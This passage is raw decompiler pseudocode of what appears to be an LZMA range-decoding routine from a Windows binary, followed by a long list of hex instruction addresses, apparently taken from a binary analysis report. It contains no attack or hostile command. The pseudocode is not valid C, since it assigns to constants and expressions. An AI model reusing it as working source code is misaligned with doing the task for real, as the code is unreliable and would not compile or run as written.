												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                    0x00407194
                                                                                    0x00407194
                                                                                    0x00407194
                                                                                    0x00407194
                                                                                    0x0040719a
                                                                                    0x0040719e
                                                                                    0x004071a2
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004074cd
                                                                                    0x004074d6
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x00407524
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00407526
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x004075db
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x004074a9
                                                                                    0x004074af
                                                                                    0x004074b6
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x00000000
                                                                                    0x004074c1
                                                                                    0x0040752b
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bf9
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c03
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c5e
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406ca8
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd2
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d18
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075cf
                                                                                    0x00000000
                                                                                    0x004075cf
                                                                                    0x00407426
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x00000000
                                                                                    0x00406dec
                                                                                    0x00406d66
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x0040749d
                                                                                    0x00407458
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
